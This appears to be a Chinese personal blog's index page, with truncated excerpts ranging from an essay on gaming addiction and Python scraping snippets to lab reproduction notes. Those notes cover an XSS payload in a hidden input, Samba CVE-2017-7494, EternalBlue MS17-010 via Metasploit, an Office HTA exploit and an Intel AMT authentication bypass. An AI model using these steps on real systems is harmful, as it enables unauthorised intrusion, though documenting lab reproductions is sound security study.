Mr.Tcsy

Mr.Tcsy

河北区域如需工地搬砖(安服)、请联系我。

你赢了游戏,却输了人生
接触王者荣耀(王者荣耀只是一个例子,各种游戏皆是一样)半年有余,观察到一个现象:于我来说只是业余时间休闲娱乐的游戏,对于某些人来说,却几乎是他的全部世界,他几乎就是活在游戏里。 你每次打开游戏,几乎都能看到他在线。你半年总共才打了200多场比赛,他一个月就打了1000场。 这是什么概念? 就算平均一场比赛耗费20分钟时间,那么他每天至少有11个小时在打游戏。 除去吃饭、睡觉的时间,他还有多少时间在工作、学习呢? 我想了一下,把时间都耗费在游戏上的人可能有三种情况:第一种他是富二代,不需要工作、学习也能衣食无忧,完全没有生活负担;第二种,他以游戏为职业,比如游戏主播、职业电竞选手;第三种:...
py 文件下载---笔记
#!/usr/bin/env python # -*- coding:utf-8 -*- import requests def download_image(): url = "https://secsb.com/wp-content/uploads/2017/07/20170711212747.png" req = requests.get(url,stream=True) with open('demo.jpg','wb') as fd: for chunk in req.iter_content(128): fd.write(chunk) download_ima...
BeautifulSoup requests
#!/usr/bin/env python # -*- coding:utf-8 -*- from bs4 import BeautifulSoup import requests def use_params_requests(): urlid= int(37558193) urlencode = str(urlid) url = "http://book.zongheng.com/chapter/680591/"+ urlencode +".html" response = requests.get(url) htmldoc = response.text soup ...
当input标签hidden属性遇到了xss
起初扫描器给出这样的一个扫描结果: <input type=”hidden” name=”filter.hotDescirbe” value=”111cfnpx”><a b=c>e4as5” />根据原始数据包测试了下发现进行了组合过滤,好吧我发现当不使用alert的时候程序就不会转义输出。 <input type=”hidden” name=”filter.hotDescirbe” value=”111cfnpx” onclick=location.href=”baidu.com”>继续看input属性的type=”hidden”字段,隐藏了,...
网站改造---背景图
一直以来都在纠结网站背景图该怎么搞,之前用js生成canvas实现动态背景,但是我发现太单调了,自己看了几天就看腻歪了。@[你懂的] 为了配合可以比较好的显示背景图,首页让我改的变成半透明化(我发现比原来还丑了。)@[勉强] 本来想使用@月宅的背景图api但是他的api每次都会刷新不同的背景图,虽然网站用了instantclick可以实现页面无刷新加载,但是总感觉还是不太好玩。(使用instantclick ,顶部大波浪刷首页出现魔动,@(不高兴)) 最后想到了拿js根据每周七天的规律来刷出不同的背景图,把脚本放在页面底部,还不会影响首页加载速度。美滋滋@[哈哈]   &nbs...
Sublime Text 3
Sublime Text 3: Package Control import urllib.request,os; pf = 'Package Control.sublime-package'; ipp = sublime.installed_packages_path(); urllib.request.install_opener( urllib.request.build_opener( urllib.request.ProxyHandler()) ); open(os.path.join(ipp, pf), 'wb').write(urllib.request.urlopen( ...
CVE-2017-7494
CVE-2017-7494@(中枪)实验环境 kali自带samb 查看版本samba -V 配置: leafpad /etc/samba/smb.confmkdir /home/samb 创建共享目录 [global] workgroup = WORKGROUP security = user guest account = root netbios name = workgroup [allshare] path = /home/samb comment = share allshare writeable = yes browseable = yes publ...
MS17-010 复现笔记&amp;永恒之蓝
nsa 的利用太麻烦,还是用msf把 msf扫描msfupdateauxiliary/scanner/smb/smb_ms17_010ms17-010 笔记 git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit cd Eternalblue-Doublepulsar-Metasploit/cp -r deps/ eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb ...
Office 漏洞复现
测试环境: 靶机:office word 2017 (12.0.6612.1000) windos 7 Sp1 机器:kali 2.0 msfconsole   msf exploit/windows/fileformat/office_word_htamsf exploit(office_word_hta) > SRVHOST 192.168.64.132msf exploit(office_word_hta) > set SRVHOST 192.168.64.132msf exploit(office_word_hta) > set payload wi...
CVE-2017-5689
详细说明:https://secsb.com/2017/05/09/406.html 利用方式:查找主机 选择其中一个打开: 访问index.html 打开Burpsuite professional 的 proxy intercept 功能 输入信息:用户名 admin 密码空 修改response参数为空:点击intercept is on GET /events.htm HTTP/1.1 Host: secsb.com:16992 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 F...